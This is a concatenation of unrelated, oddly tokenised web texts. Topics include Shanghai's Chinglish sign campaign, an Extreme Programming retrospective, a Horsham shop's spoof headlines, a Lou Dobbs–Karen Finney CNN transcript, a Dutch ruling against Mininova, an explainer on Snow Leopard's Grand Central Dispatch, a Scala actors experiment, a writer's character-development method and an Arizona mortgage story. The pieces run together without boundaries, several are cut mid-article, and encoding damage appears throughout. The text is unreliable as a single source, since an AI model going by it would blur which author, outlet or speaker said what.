By Chris Hogg
BBC News , Shanghai
Examples of often baffling Chinglish can be found across Shanghai
The authorities in the Chinese city of Shanghai are starting a campaign to try to spot and correct badly phrased English on signs in public places .
Chinglish , as the inaccurate use of the language is known , has long been a source of embarrassment for the authorities there .
It is also a source of amusement to foreign visitors .
But Shanghai wants to spruce up its image .
It is expecting millions of visitors for the World Expo fair .
Student volunteers will check the English on signs throughout the city .
If they suspect the translation is less than accurate they will inform the government .
Then the bureaucrats will request that whoever is responsible corrects the mistake .
You can find Chinglish all over the city .
Often it can be blamed on software used to translate Chinese automatically .
Please bump your head carefully
Sign in hotel lift
See your pictures of ' Chinglish ' signs Sometimes you can see what the author was getting at , such as the sign that warns people to " keep valuables snugly " , and " beware the people press close to you designedly " .
Then there are signs where they have mistranslated a crucial word .
One in a hotel lift advises people " please leave your values at the front desk " .
Sometimes they have just got it the wrong way round , such as on the sign in the stairwell of a department store asking shoppers to " please bump your head carefully " .
My favourites though , are those which get more surreal , like the one on the Shanghai metro from the public security bureau that reads : " If you are stolen , call the police at once . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Just a few of the thousands of tributes pouring in from around the country and the world .
Share your own memories here .
In the decade since the inception of XP , a lot has happened in the development world .
Chet Hendrickson , author of Extreme Programming Installed , talks about the most interesting of these changes .

When I 'm feeling particularly arrogant , I 'll sometimes say that I was doing XP before it had a name .
While that 's true , it really is n't very interesting .
Perhaps more interesting is what has happened to this thing we call XP since it became something worthy of a name .
In Extreme Programming Installed , we described 13 core practices .
Over the years , I 've come to believe that those 13 are not themselves XP , but just the things you do to teach yourself what XP really is .
Nonetheless , those practices tell us a lot about what developers and teams should do to be successful .
They still represent many truths about how to do iterative and incremental development .
Most of those original XP practices are as valid today as they were 10 years ago .
I 'll leave it to others to write about those .
For this article , I want to look at the things that have changed .
User Story Size
Our original advice was that a user story should n't extend beyond the length of your iteration .
If your iteration was three weeks ( as it was in the original formulation of XP ) , individual stories should each take less than three weeks to complete .
We were n't even very forceful in that limit .
C3 had a few stories that were estimated at around 20 days , but we felt it was good to try .
Today , no one would condone a 20 day story .
The desire for smaller stories came to us from Don Wells .
Don was an original member of the C3 team .
He had left to start the second XP project over at Ford and later returned to Chrysler .
Don had hit upon the idea that if all your stories were sufficiently small , you could handle most project - management activities just by counting them .
How small is " small " ?
Back when I was a COBOL programmer , I discovered that if I broke down the things I was working on to chunks no larger than three days , I could estimate with reasonable accuracy .
So that 's my maximum story size — three days .
Any story estimated to take more than three days to complete should be broken into smaller stories .
Each of those new , smaller stories must have business value .
They 're not engineering tasks .
If you use this strategy , you wo n't need engineering tasks in order to do your iteration planning — you just use the stories .
Iteration length
When we did C3 , we settled on three - week iterations .
We believed that an iterative approach made a lot of sense ; however , having failed to get anything done in 14 months , we could n't convince ourselves that one or two weeks was enough to have real progress .
We wanted a fixed length , and a month did n't really do that .
Four weeks looked a lot like a month , so that was out , leaving us with three weeks — so three weeks it was .
Three weeks was long enough to complete some real business value , but not so long that if we blew one iteration , it would sink the project .
Three weeks worked well for us , well enough that it became the XP standard .
But now that user stories can be completed in three days or less , do we need three weeks to get something done ?
Of course not .
Changing the iteration length was one of the first things attempted by teams adopting XP .
A few groups tried longer iterations , but this is almost always a sign of dysfunction .
Most groups tried smaller iterations , with two weeks becoming the new standard , and one week not uncommon .
Today , some teams are going even further by eliminating iterations altogether .
Many teams are using a Kanban - like approach , in which the development team pulls stories from a queue of things " to be worked on , " and either releases them upon completion or when some predefined bundle is ready .
Some of these teams have done away with the estimation of individual stories altogether , and instead track the elapsed time from entering the queue until the story is released to the end user .
These approaches seem to have merit , and are the subject of intense discussion on the extremeprogramming , kanbandev , and leanagile Yahoo ! discussion groups .
Metaphor
I still think system metaphor was a good idea .
It 's a pity that we could never explain what it was .
Controlling the language used within a team is perhaps the most powerful move an individual or faction can make .
The adoption of a real and useful system metaphor requires the surrender of your native language and the acceptance of a new , alien one .
It was common to find groups within large teams expressing their hegemony over others through the use of " naïve " metaphor .
This was usually done by leaders of the developer group — folks who may even be clinging to an " architect " title .
They would call the names found on their system architecture diagrams by a metaphor — things like business layer and data access object .
When you saw this , you knew that the team was split : developers on one side , business analysts and QA folks on the other .
You also knew that the developer side had already won some internal battle for control .
It did n't take too many teams like this to make system metaphor useless .
Dispersed Teams
I left Chrysler in 2000 and went to work for a Chicago - based consulting company .
The first team I worked with there had a team lead , five or six developers , and two business analysts ( BAs ) acting as the customer .
The developers had a small , open work area that pretty much met our needs and almost fulfilled XP 's need for a team room .
The business analysts sat in low - walled cubicles about 20 feet away .
The developer area did n't have a door , so you could stand in the middle of the room and see the back of the business analysts ' heads .
This was the almost part .
Our team was geographically dispersed .
Yes , it was only 20 feet .
Yes , they could have thrown a rock and hit one of us without much effort .
And yet , it was too far !
My best recollection of the dysfunction caused by this distance was a conversation between two of the developers , wondering what a written bit of business requirement meant .
They went back and forth for the better part of a half hour .
The people who knew the answer were just 20 feet away — you could see them , and if they sneezed you would say , " Gesundheit . "
And , yet the developers kept talking to only each other , with me watching in amazement .
Finally , they decided that they did n't know the answer , and that the best solution was to go on to something they understood better .
They were n't going to work on their highest priority , but rather on something of less value .
I could n't stand it any longer and suggested that they go and talk to the business analyst who had written the story for clarification .
Have I mentioned that the BA was within spitting distance ?
Did the developers stand up and walk over to the BA 's desk ?
No , one of them picked up the phone and called !
I could hear the phone ring and the BA answer and discuss the issue .
If this is the sort of thing that happens when your team is split by 20 feet , what do you think happens when they 're in separate buildings or different states , or on different continents ?
I know that we have reasons for spreading our teams around the globe .
I just do n't believe that there are good reasons .
We Thought We Were Going to Change the World
On the whole , I look back at where we were in 2000 , and I think that we 've mostly moved in the right directions .
I still miss metaphor and will argue that your developers and customers should be closer together , but I do believe we have changed the world .
The ideas that first found purchase in extreme programming , Scrum , and Crystal , and in the writings of people who cared about improving the world of software development , have made a real difference .
Is there a Java developer who has n't at least heard of JUnit ?
Or a job shop salesman who does n't tout his company as being Agile ?
I can't wait to see where we 'll be in another 10 years .
A shop owner has said he was threatened with prosecution after displaying joke billboards at his store in Horsham .
John O'Sullivan , who owns the Candy Box , put up spoof news headlines outside his store for 10 weeks in an attempt to entertain his customers .
The spoof headlines included " Crawley Girl Gives Birth to Pitbull " and " Local Youths Abduct UFO " .
Sussex Police denied he was threatened with arrest but the local council said it had asked him to take one sign down .
Mr O'Sullivan said : " The policewoman came in and was very strict and said the boards have got to stop .
She asked if I realised I could be arrested .
At no point did we suggest that he could be arrested - although if there was a law about having a dodgy sense of humour , there might well be a case
Sussex Police
" If everyone hated them and thought they were wrong I would stop but people are laughing at them . "
But the police said : " While passing on routine patrol last month an officer did have a friendly conversation with the shop owner .
" At no point did we suggest that he could be arrested - although if there was a law about having a dodgy sense of humour , there might well be a case .
" Full marks to him for clever advertising though . "
But the local council said it had asked Mr O'Sullivan to remove one of the posters .
A spokesman for Horsham District Council said : " We can confirm that the council has received recent complaints about what has been written on the A - board outside the shop .
" As a message posted there was considered to be potentially offensive , a street scene officer from the council asked for its removal . "
The latest sign on display reads " Candy Box Owner Threatened with Arrest over Funny Boards " and Mr O'Sullivan has vowed to continue displaying the tongue - in - cheek adverts .
Candy Box customer Shirley Arlington said : " It 's crazy .
John 's just having a laugh and he 's making other people laugh too . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Geez Louise .
What in the hell does Lou Dobbs have to do next before CNN decides to reign him in or can him ?
Apparently Dobbs did n't take too kindly to Karen Finney calling him out as using hate speech for the comments he made about her former boss , Howard Dean on his radio show .
Our friends at Media Matters posted that one : Dobbs on Howard Dean : " [ H ] e's a bloodsucking leftist -- I mean , you gotta put a stake through his heart to stop this guy " .
DOBBS : Excuse me .
Excuse me .
If you will permit me , I called him a blood sucking leftist because of the approach he took .
FINNEY : But how does your saying things like that --
FINNEY : That is a convenient correction , Mr. Dobbs .
But you called him a blood sucking liberal .
DOBBS : You heard me make a reference to Bram Stoker , an allusion to Howard Dean and , as a matter of fact , I was --
DOBBS : Really ?
Did I say I wanted to do that through Howard Dean 's heart ?
FINNEY : Because what we 're seeing is , I believe that tyranny is when you organize for the purpose of being disruptive , or when you use hate speech like " I want to drive a stake through Howard Dean 's heart . "
DOBBS : Then why is everybody trying to constrain expression ?
FINNEY : Our American values say that we believe in free speech .
We believe in --
DOBBS : Do you think they are also evil mongers ?
Is that the latest from Senator Reid ?
We 've gone from un -American now to evil mongers .
As Finney pointed out , the " leftist " vs " liberal " part was n't exactly the portion of his comments that concerned her the most .
So what does Dobbs do ?
He plays this from Ed Schultz as some sort of defense that there is hate talk from the left as well .
SHULTZ : Sometimes I think they want Obama to get shot .
I do .
I really think that there are conservative broadcasters in this country who would love to see Obama taken out .
They fear socialism .
They fear Marxism .
They fear that the United States of America wo n't be the United States of America anymore .
So there 's your left wing hate speech in Dobbs ' world folks .
Pointing out the obvious .
And what does Dobbs finish the segment with ?
Attacking Finney again , and defending the idiot who brought a gun to a town hall .
Wow .
Full transcript below the fold from CNN .
Apparently they decided to leave out some of the ugliness with " ( CROSSTALK ) .
DOBBS : These polls are showing that independents are deserting the president both in terms of approval rating , in terms of health care .
And we 're seeing independents side with the protesters in these town hall by a two to one margin .
What 's that about ?
FINNEY : I think it 's a little hyperbolic to say that they are abandoning the president .
And to say that you , sympathize with the protestors --
( CROSSTALK )
DOBBS : It 's 65 percent of the unaffiliated -- I 'm sorry .
I used shorthand and said independent .
FINNEY : Well , again , speaking to what we 're seeing at the town halls , I think that some people believe -- I believe people should have the right to go and speak out and ask questions .
But that 's not what we 've been seeing .
What we 're seeing is people organizing against letting the questions asked and asked .
And I wonder if we'd ask that question if we 're talking about , when they say they sympathize with the protestors , are they sympathizing with the people who are asking the questions , or are they sympathizing with the people who are actually creating -- causing violence and hate speech , which I think is the absolutely destructive to the process and un-American .
DOBBS : Do you think they are also evil mongers ?
Is that the latest from Senator Reid ?
We 've gone from un -American now to evil mongers .
FINNEY : Our American values say that we believe in free speech .
We believe in --
DOBBS : Then why is everybody trying to constrain expression ?
FINNEY : Because what we 're seeing is , I believe that tyranny is when you organize for the purpose of being disruptive , or when you use hate speech like " I want to drive a stake through Howard Dean 's heart . "
DOBBS : Really ?
Did I say I wanted to do that through Howard Dean 's heart ?
FINNEY : I heart that on your radio program .
DOBBS : You heard me make a reference to Bram Stoker , an allusion to Howard Dean and , as a matter of fact , I was --
FINNEY : That is a convenient correction , Mr. Dobbs .
But you called him a blood sucking liberal .
( CROSSTALK )
FINNEY : But how does your saying things like that --
DOBBS : Excuse me .
Excuse me .
If you will permit me , I called him a blood sucking leftist because of the approach he took .
( CROSSTALK )
FINNEY : Oh , excuse me , leftist , not liberal .
DOBBS : I do n't see where in the constitution that you have a right not to be offended .
FINNEY : My question to you ...
DOBBS : I 'm sorry , you do have a right not to be offended ?
FINNEY : My question to you though is --
( CROSSTALK )
DOBBS : Evil mongers , un -American .
You want to worry about language ?
Let 's hear about Ed Shultz today .
Roll what Ed Shultz had to say today .
Are you familiar ?
FINNEY : Yes , I am .
DOBBS : Actually , he said it Tuesday .
( BEGIN VIDEO CLIP )
SHULTZ : Sometimes I think they want Obama to get shot .
I do .
I really think that there are conservative broadcasters in this country who would love to see Obama taken out .
They fear socialism .
They fear Marxism .
They fear that the United States of America wo n't be the United States of America anymore .
( END VIDEO CLIP )
FINNEY : I do n't totally agree with everything that Ed said .
I 'm not as far to the left as Ed is .
DOBBS : No .
But you are an ideologue .
FINNEY : I am not .
DOBBS : You are pursuing an agenda .
FINNEY : Absolutely not .
DOBBS : And you 're being rude .
DOBBS : Let 's go to Errol and get your thoughts .
( CROSSTALK )
LOUIS : Let me say that my friend Ed Shultz has put his finger on something that is important , which is that there is a lot -- day in and day out --
DOBBS : He 's put his finger on something important ?
LOUIS : Yes .
There are people , Lou , and I do n't want to call any names , but there are broadcasters out there who have been saying day after day after day that White House is preparing is concentration camps , that there are death panels s .
DOBBS : If anyone is saying that , we should be saying their names .
Who are they ?
LOUIS : Michael savage .
You hear similar kind of talk from Rush Limbaugh .
DOBBS : Not similar .
You used very specific language .
Who used that language ?
LOUIS : Death panels , all over the place .
All over the place .
I mean all over the place .
Seriously .
On your station , Lou .
DOBBS : You said concentration camps .
LOUIS : They have described them in detail , that order is going to come .
DOBBS : Answer the question .
LOUIS : And when you see somebody show up --
DOBBS : Has anyone done what Ed Shultz said ?
Has anyone done that ?
This is beyond the pale of ideology .
LOUIS : I think there are people who are doing the exact equivalent , or the radio , the media equivalent of fulminating , sowing discord , and in effect placing almost , metaphorically , a loaded gun on the table and then walking out of the room .
DOBBS : My god , to even use that metaphor .
I have to be honest with you , you and I have known each other for a long time .
That is a patently ideological --
LOUIS : Lou , wait .
DOBBS : Go ahead , Chris , I do n't -- we do n't want to leave Chris out of this debate .
STIREWALT : I think what is illustrated here is that --
( CROSSTALK )
STIREWALT : No .
The only thing I see here is nobody is talking about health care anymore .
We are talking about the mob .
We 're talking about the president .
DOBBS : The Congress was n't either , Chris , in all honesty .
STIREWALT : Exactly .
But I think the point here is that White House has lost control of this discussion .
Congress has lost control of the discussion .
They did n't put any -- they did n't put a final idea forward , a proposal to the American people , which is understandable .
The president wanted one done by August so there would be something to talk about .
They failed in that goal and right now people are understandably upset .
The anger , the discussion , the outrage that we hear , I think , is illustrative of the fact that the Democratic majority has done a good job of selling this thing to the American people and now they 're attacking the people who are upset about it .
FINNEY : I obviously take issue with that .
We 're not attacking people that are upset .
We 're suggesting that at these town halls --
DOBBS : You take exception to what ?
FINNEY : People that come to the town halls --
DOBBS : We do n't care what you 're taking exception to .
FINNEY : Then why are you having me on the show to talk about health care reform ?
DOBBS : I 'd love to hear you talk about it .
But you started talking to me about something I said on radio about Howard Dean .
What 's that got to do with it ?
FINNEY : That 's exactly my point , Lou .
What does that have to do with it ?
DOBBS : We appreciate you bringing up those points to us .
Errol , thank you very much .
( CROSSTALK )
LOUIS : When people are bringing guns to town hall meetings , and it 's happened more than once , that is a problem .
FINNEY : You think it 's appropriate to bring guns to town hall meetings ?
( CROSSTALK )
DOBBS : You are doing everything can you to absolutely distort an event that occurred that was absolutely benign .
A man was making a point .
He happens to live in a state in which guns are permitted to be carried .
It 's open carry .
It 's a constitutional right .
Now you not only went to constrain freedom of speech and freedom of expression , you want to attack the Second Amendment and distort it into something sinister when you 're sitting here talking in language that I frankly , Errol , I think is highly irresponsible .
( CROSSTALK )
DOBBS : We 'll be right back .
Fresh off a set of legal wins against The Pirate Bay , the music and movie industries have just scored another court victory against the massive BitTorrent search engine Mininova .
A Dutch judge in Utrecht has given Mininova three months to purge all links to copyrighted content from its site — or pay up to �5 million in penalties .
As with The Pirate Bay , Mininova 's operators were n't accused of copyright infringement .
In a peer - to - peer system , the actual files being transferred reside on millions of computers around the globe , and thus any direct infringement would be the responsibility of those users .
But , like most countries , the Netherlands recognizes " contributory copyright infringement , " which was the charge in this case .
The court case was brought by Stichting BREIN , a Dutch antipiracy consortium .
While the charges were similar to those brought against The Pirate Bay admins in Sweden earlier this year , the two cases were quite different ; unlike The Pirate Bay 's deliberately inflammatory tactics , Mininova has long taken down copyrighted links flagged by rightsholders .
Not that this made rightsholders happy .
Complaints had to be made against specific links , not against specific films or albums ; if someone uploaded another copy , another takedown request had to be made .
The burden of policing such a popular site was tremendous ( similar arguments were made in reference to YouTube during its early days , but the site gradually adopted filtering technology that mollified most of the major rightsholders ) .
The Utrecht court found that Mininova was inciting copyright infringement in others and was profiting from that behavior through ad sales ( and the company earned more than � 1 million in 2007 alone ) .
A study of randomly selected files made back in June showed that 80 - 90 percent of them appeared to be copyrighted ; a quick look at the front page of Mininova today shows links to Inglorious Basterds , District 9 , Whitney Houston , Jay - Z , " Non Nude Homemade Booty Bouncing , " and Mac OS X 10.6 Snow Leopard ( Final Release ) , among others .
According to the judge , Mininova must assume that all commercially produced content is copyrighted unless it knows otherwise , and that the site must adopt proactive filtering of such content .
Combined with the news that Global Gaming Factory X plans to acquire The Pirate Bay tomorrow and turn it into a legal operation , Big Content 's game of Whac - A - Mole does appear to be racking up the rodent skins .
While the ease of setting up such sites means they are probably impossible to stop ( and of course they host plenty of legal content , too ) , Big Content would sure like to make it less than brain - dead - simple to grab a copy of that hot new album .
Further reading :
For years , it ’s been part of the armoury of any self - respecting cricketing side , and the Australians have always been world - beaters at it .
Sledging - the mocking insults swapped between players out at the wicket - has long been part of the battle and whatever the two captains say ahead of the forthcoming Ashes series , so it will be again this summer .
Download the new Independent Premium app Sharing the full story , not just the headlines
Click here or click the image to launch our guide .
Most of these are probably at least partly apocryphal and many have been attributed to different players at different times , but the English and Australian teams will have to go some to top these this summer .
Beginning today , Interplay titles including the original Fallout Sacrifice and Kingpin will become available for purchase via Steam .
" We are excited to offer the millions of Steam customers online access to Interplay titles beginning with some jewels of our classic PC catalog priced below $ 10 , " said Herve Caen , Interplay CEO .
Well put , Herve .
Welcome aboard !
Oh , you can also get the three Fallout games as a package deal here as Fallout Collection
Grieving father finds ' dead ' baby son ALIVE in coffin
Premature : Doctors said the baby boy 's heartbeat was undetectable
A premature baby declared dead by doctors was found to be alive hours later when he was taken home for a funeral wake .
The baby 's father , Jose Alvarenga , was told by doctors that his son had died shortly after birth .
Staff from the state - run hospital in Asuncion , the Paraguayan capital , delivered the infant 's body to Mr Alvarenga 's home fours hours later .
The baby was declared dead at a state - run hospital in the Paraguayan capital , Asuncion
Two years ago , a baby boy from Leeds ‘ came back to life ’ 30 minutes after doctors pronounced him dead .
Medical staff at Leeds General Infirmary had tried in vain to resuscitate two - week - old Woody Lander after the little boy suffered a heart attack .
He was handed over to parents Jon and Karen Lander so they could say goodbye , but half an hour later the couple heard the boy cough and doctors started his heart .
You 've probably heard about this snow kitty operating system for Macintosh computers .
What you might not 've heard is exactly how it 's supposed to be unleashing the power of all those processor cores crammed inside your computer .
Advertisement
Snow Leopard Review : Lightened and Enlightened OS X Snow Leopard seems to do nothing really new .
And yet , it could be their most important OS … Read more
The heart of the matter is that the trick to actually utilizing the full power of multiple processors — or multiple cores within a processor , like the Core 2
Duo you 've probably got in your computer if you bought in the last two years — is processing things in parallel .
That is , doing lots of stuff side by side .
After all , you 've got 2 , maybe 4 or even 8 processors at your disposal , so to use them as efficiently as possible , you want to pull a problem apart and throw a piece of it at each core , or at least send different problems to different cores .
Sounds logical , right ?
Easy , even .
Advertisement
The rub is that writing software that can actually take advantage of all of that parallel processing at an application level is n't easy , and without software built for it , all that power is wasted .
In fact , cracking the nut of parallel processing is one the major movements in tech right now , since parallelism , while it 's been around forever , has been the domain of solving really big problems , not running Excel sheets on your laptop .
It 's why , for instance , former Intel chair Craig Barrett told me at CES that Intel hires more software engineers than hardware engineers — to push the software paradigm shift that 's gotta happen .
A big part of the reason parallel programming is hard for programmers to wrestle with is simply most of them have never spent any time thinking about parallelism , says James Reinders , Intel 's Chief Software Evangelist , who 's spent decades working with parallel processing .
In the single core world , more speed primarily came from a faster clock speed — all muscle .
Multi-core is a different approach .
Typically , the way a developer takes advantage of parallelism is by breaking their application down into threads , sub - tasks within a process that run simultaneously or in parallel .
And processes are just instances of an application — the things you can see running on your machine by firing up the Task Manager in Windows , or Activity Monitor in OS X .
On a multi- core system , different threads can be handled by different processors so multiple threads can be run at once .
An app can a lot run faster if it was written to be multi- threaded .
One of the reasons parallel programming is tricky is that some kinds of processes are really hard to do in parallel — they have to be done sequentially .
That is , one step in the program is dependent on the result from a previous step , so you can't really run those steps in parallel .
And developers tend to run into problems , like a race condition , where two processes try to do something with the same piece of data and the order of events gets screwed up , resulting in a crash .
Advertisement
Snow Leopard 's Grand Central Dispatch promises to take a lot of the headache out of parallel programming by managing everything at the OS level , using a system of blocks and queues , so developers do n't even have to thread their apps in the traditional way .
In the GCD system , a developer tags self - contained units of work as blocks , which are scheduled for execution and placed in a GCD queue .
Queues are how GCD manages tasks running parallel and what order they run in , scheduling blocks to run when threads are free to run something .
Reinders says he 's " not convinced that parallel programming is harder , it 's just different . "
Still , he 's a " big fan of what Apple 's doing with Grand Central Dispatch " because " they 've made a very approachable , simple interface for developers to take advantage of the fact that Snow Leopard can run things in parallel and they 're encouraging apps to take advantage of that . "
Advertisement
How Snow Leopard handles parallelism with GCD is a little different than what Intel 's doing however — you might recall Intel just picked up RapidMind , a company that specializes in optimizing applications for parallelism .
The difference between these two , at a broad level , represent two of the major approaches to parallelism — task parallelism , like GCD , or data parallelism , like RapidMind .
Reinders explained it like this :
If you had a million newspapers you want to cut clips out of , GCD would look at cutting from each newspaper as a task , whereas RapidMind 's approach would look at it as one cutting to be executed in a repetitive manner .
For some applications , RapidMind 's approach will work better , and for some , GCD 's task - based approach will work better .
In particular , Reinders says something like GCD works best when a developer can " figure out what the fairly separate things to do are and you do n't care where they run or in what order they run " within their app .
It 's also a bit different from Windows ' approach to parallelism , which is app oriented , rather than managing things at the OS level , so it essentially leaves everything up to the apps — apps have got to manage their own threads , make sure they 're not eating all of your resources .
Which for now , is n't much of a headache , but Reinders says that there is a " valid concern on Windows that a mixture of parallel apps wo n't cooperate with each other as much , " so you could wind up with a situation where say , four apps try to use all 16 cores in your machine , when you 'd rather they split up , with say one app using eight cores , another using four , and so on .
GCD addresses that problem at the system level , so there 's more coordination between apps , which may make it slightly more responsive to the user , if it manages tasks correctly .
Advertisement
You might think that the whole parallelism thing is a bit overblown — I mean , who needs a multicore computer to run Microsoft Word , right ?
Well , even Word benefits from parallelism Reinders told me .
For instance , when you spool off something to the printer and it does n't freeze , like it used to back in the day .
Or spelling and grammar running as you type — it's a separate thread that 's run in parallel .
If it was n't , it 'd make for a miserable - ass typing experience , or you 'd just have to wait until you were totally finished with a document .
There 's also the general march of software , since we love to have more features all the time : Reinders says his computer might be 100X faster than it was 15 years ago , but applications do n't run 100 x faster — they 've got new features that are constantly added on to make them more powerful or nicer to use .
Stuff like pretty graphics , animation and font scaling .
In the future , exploiting multiple cores through parallelism that might be stuff like eyeball tracking , or actually good speech recognition .
Reinders actually thinks that the opportunities for parallelism are limitless .
" Not having an idea to use parallelism in some cases I sometimes refer to as a ' lack of imagination , ' " because someone simply has n't thought of it , the same way people back in the day thought computers for home use would be glorified electronic cookbooks — they lacked the imagination to predict things like the web .
But as programmers move into parallelism , Reinders has " great expectations they 're going to imagine things the rest of us , " so we could see some amazing things come out of parallelism .
But whether that 's next week or five years now , well , we 'll see .
Advertisement
[ Back to our Complete Guide to Snow Leopard ]
Advertisement
Still something you wanna know ?
Send questions about parallel processing , parallel lines or parallel universes to tips@gizmodo.com , with " Giz Explains " in the subject line .
Grand Central Terminal main concourse image from Wikimedia Commons
Please turn on JavaScript .
Media requires JavaScript to play .
President Barack Obama was defending his economic stimulus plan when one of his teleprompter screens crashed to the floor and shattered into pieces .
The glass plate displaying his speech hit the floor in the auditorium of the Eisenhower Executive Office Building , within the White House compound .
Being quite a fan of Groovy ( which also is related to Spring in some way ) , I nevertheless experimented with Scala a bit .
Trying not to follow the current hype about this language , I mainly wanted to check a higher - level ( meaning higher than Java ) , typed language and like Scala , even though to me there seems to be too much magic in it to overcome the non-dynamic aspect ( this might not be formally correct , but hopefully understandable ) .
Due to this non-dynamic aspect , many things which are highly praised in Scala seem clumsy compared to Groovy .
Just compare the granted - better - than - Java XML - handling in Scala with the even - much - better XML - handling in Groovy .
Of course , my IDE will never be able to code complete the Groovy variant – however , currently , the Scala Eclipse Plugin does it neither .
So , I bought the book “ Programming in Scala ” , which is good , but there are certain parts which are not too well described , one being the difference between “ receive ” and “ react ” .
I did it understand only after trying out myself ( see below ) and reading this post .
Once again , stackoverflow.com has been very useful to me ( I just know the site for about 2 - 3 months and found useful information there several times ) .
So , I wanted to try if I can validate the different behaviour ( which is in short that receive blocks a Thread and react returns immediately and is not bound to a particular Thread – but there are better explanations out there ) .
Preparation
I wanted to check the behaviour by forcing Scala to instantiate just one thread in the thread pool .
This can be done by setting two system properties :
- Dactors.maxPoolSize=1 - Dactors.corePoolSize=1
this can be concluded by the Actors sources .
Running
I used two different objects :
import scala.actors ._ import scala.actors .Actor._ object Reactor extends Actor { def act ( ) { while ( true ) { receive { case ( x : String , actor : Actor ) => println ( " received : " + x ) actor ! ( x , self ) } } } }
and the Runner :
import scala.actors ._ import scala.actors .Actor._ object Runner extends Actor { def act ( ) { while ( true ) { receive { case ( string : String , actor : Actor ) => println ( " got : " + string ) actor !
( " hello " , self ) } } } def main ( args : Array [ String ] ) : Unit = { Runner.start( ) Reactor.start ()
Reactor ! ( " hello " , Runner ) } }
Starting the application with this parameters just freezes it immediately .
We need at least a threadpool of two threads .
With these two threads , the application starts and the result with visualvm is like this :
Switching while ( true ) to loop and receive to react results in one sharing thread , which means the size can be max=1 , core=1 and the application runs like this :
Which look like it should – the react does not block the thread , therefore one “ shared ” thread is enough – the react of each actor is then “ attached ” to the main thread .
After posting Lost , I received several questions asking how I was able to bring the character to life so well .
The truth is , I did n’t bring him to life .
He sprang out on his own .
As I wrote about this character ( a few years ago now ) , I thought he was something interesting in and of himself .
I like to know my characters intimately –understanding every decision , every motive , and every emotion .
Some authors like to create detailed character sheets , similar to those used / discussed at Dungeons & Dragons , National Novel Finishing Month , Eclectics , or Bethany Harvey .
These also work fine for minor to medium importance characters , where understanding their motivations is less vital to the story .
These sheets are certainly valuable tools , but just asking myself questions about the character only gets me so far in truly understanding the character .
Character sheets tell me what skills the character has and what the character looks like , but not how the character thinks .
For my main characters , though , this is n’t enough ( at least for me ) .
To make these characters believable , as real as you or me , I need to understand them inside and out .
I use an old acting technique to accomplish this –I become the character .
While I ’m writing from their perspective , I allow myself to melt away , replacing my own world view , experiences , and memories with those of my character .
For all intents and purposes , while I ’m in that mode , I am that character .
I understand their thought process because it is my own .
When I adopt the background of a character , no matter how different they are from me , I start seeing them making decisions differently than those I might make .
These decisions might be small ( a salad instead of fries , taking the elevator rather than the stairs , etc ) , but can also be much larger ( moving across the country instead of addressing a problem at home , etc ) .
While the character has control , I am ( most often ) not working on the actual story .
My intent is different –I want to understand how the character thinks .
I ’m writing or typing out their thoughts as they think them , trying to capture the essence of who they are at some specific scene .
The text I write while developing the character may never make it into the final copy , but the impact on the text is clearly felt in every page .
And now for a short interlude : Nina Conti , a ventriloquist , has a related act .
Watch as she similarly develops a character !
( Warning : includes some swearing and sexual references )
In Lost , I was introducing myself to the character .
I knew the situation he was in ( having just lost his job ) , but I wanted to see what he thought , how he felt , and what his background was .
For the moment , it did n’t matter what I , as the author , thought about the situation .
That was n’t what I was interested in .
I wanted to know how the character thought–naked , unfiltered , and completely honest .
I was n’t judging my character –I wanted to understand him .
To focus my efforts , I had a few simple things written down : the main event ( his job loss ) , his family life ( wife and two children ) , and the industry ( automotive ) .
I also had the experience of working one summer in a shop where we assembled transmission solenoids , so I had a basic understanding of the type of environment and people that worked in that type of setting .
The character took over from there , his personality forming as I typed .
Allowing another character to take over my hands as I type is scary .
For a few moments ( sometimes quite a bit longer ) , I am not myself .
My consciousness , my memories , and my emotions are packaged away , waiting until the character releases control .
I suppose it ’s a form of self - hypnosis , allowing myself to take on a different mental state .
I ’m certainly in a bit of a trance while I ’m in this mode , the character taking life through my hands .
However , allowing the character to take control allows me to see them for who they really are , which means I can better capture their personality when I start writing the story I intended to write .
When I take back control from my character , I ’m often somewhat changed –I now think a bit differently than I did before the character took control .
I ’m not sure it ’s possible to channel another consciousness without being somewhat changed in the process .
However , I ’ve found that the changes are mostly positive –I gain exposure to another point of view , and that allows me to look at my story in an entirely different light .
The stories I write also greatly benefit from these insights .
The character has depth ( and life ) far beyond the pages of the book .
This also means that , as a writer , I can , at a later time , meet up with them again , since I understand the path their life was leading them down .
Once the character is real to me , I can better describe the character to my readers .
What methods have you used to get into your character ’s head ?
Do you similarly “ walk the mile in their shoes ” ?
You may also want to check out our site survey .
Let us know what we can do to improve !
The 10 question survey should only take a few moments to complete .
Tags : believability , character , character development , character sheets
MESA , Ariz . 
She had seen the advertisements for the new government program offering relief .
She had heard President Obama promise that help was on the way for homeowners like her , people who had lost jobs and could no longer make their mortgage payments .
But when Eileen Ulery called her mortgage company 
Countrywide , now part of Bank of America  the bank did not offer to alter her mortgage .
Rather , the bank tried to sell her a new loan with a slightly lower monthly payment while asking her to pay $ 13,000 toward the principal and a fresh $ 5,000 in fees .
Her problem was that she did not yet present a big enough problem to merit aid .
Yes , she was teetering toward delinquency .
She was among millions of homeowners rapidly sliding toward danger for whom the Obama administration had devised an aid program  some already in foreclosure proceedings , others headed that way as they ran out of means to make their payments .
But unlike those in imminent peril of losing their homes , Ms. Ulery had never missed a payment .
“ I do n’t know who this bailout is helping , ” she said .
“ We ’ve given these banks all this money and they ’re not doing what they say they ’re doing .
Something ’s not working right .
They keep saying they ’re doing all this , but we do n’t see it down here at this level . ”
Home sweet home – i can’t work in my regular office so i’m made my little house at my work place .
Un-American
James Joyner · · 57 comments
T he Outrage of the Day , apparently , is a USA Today op - ed by Nancy Pelosi and Steny Hoyer in which they assert “ Drowning out opposing views is simply un-American . ”
